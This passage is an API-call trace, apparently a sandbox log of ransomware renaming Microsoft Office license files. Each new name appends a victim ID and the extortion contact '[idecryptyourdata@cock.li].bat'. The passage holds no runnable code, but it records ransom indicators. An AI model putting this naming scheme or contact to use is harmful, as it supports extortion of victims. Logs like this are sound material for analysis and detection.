office\\root\\licenses16\\homebusinessr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.117] CloseHandle (hObject=0x50c) returned 1 [0163.117] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.117] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.118] CloseHandle (hObject=0x50c) returned 1 [0163.118] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.118] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.119] CloseHandle (hObject=0x50c) returned 1 [0163.119] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.119] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.120] CloseHandle (hObject=0x50c) returned 1 [0163.120] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.120] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.121] CloseHandle (hObject=0x50c) returned 1 [0163.121] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.121] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.122] CloseHandle (hObject=0x50c) returned 1 [0163.122] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.122] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.123] CloseHandle (hObject=0x50c) returned 1 [0163.124] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.124] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.124] CloseHandle (hObject=0x50c) returned 1 [0163.125] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.125] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.125] CloseHandle (hObject=0x50c) returned 1 [0163.126] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.126] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.126] CloseHandle (hObject=0x50c) returned 1 [0163.127] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.127] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.128] CloseHandle (hObject=0x50c) returned 1 [0163.128] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.128] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.129] CloseHandle (hObject=0x50c) returned 1 [0163.129] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.129] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.130] CloseHandle (hObject=0x50c) returned 1 [0163.130] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.131] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.131] CloseHandle (hObject=0x50c) returned 1 [0163.132] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.417] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.584] CloseHandle (hObject=0x50c) returned 1 [0163.584] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.585] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.585] CloseHandle (hObject=0x50c) returned 1 [0163.586] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.587] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.587] CloseHandle (hObject=0x50c) returned 1 [0163.588] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.588] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.588] CloseHandle (hObject=0x50c) returned 1 [0163.589] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.589] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.589] CloseHandle (hObject=0x50c) returned 1 [0163.590] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.590] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.591] CloseHandle (hObject=0x50c) returned 1 [0163.591] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.591] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.592] CloseHandle (hObject=0x50c) returned 1 [0163.593] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.593] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.593] CloseHandle (hObject=0x50c) returned 1 [0163.594] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.594] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.594] CloseHandle (hObject=0x50c) returned 1 [0163.595] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.595] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.596] CloseHandle (hObject=0x50c) returned 1 [0163.597] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.597] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.597] CloseHandle (hObject=0x50c) returned 1 [0163.598] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.598] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.598] CloseHandle (hObject=0x50c) returned 1 [0163.602] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.602] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.602] CloseHandle (hObject=0x50c) returned 1 [0163.603] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.603] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.603] CloseHandle (hObject=0x50c) returned 1 [0163.604] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.604] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.605] CloseHandle (hObject=0x50c) returned 1 [0163.605] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.605] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.606] CloseHandle (hObject=0x50c) returned 1 [0163.606] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.607] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.607] CloseHandle (hObject=0x50c) returned 1 [0163.608] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.608] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 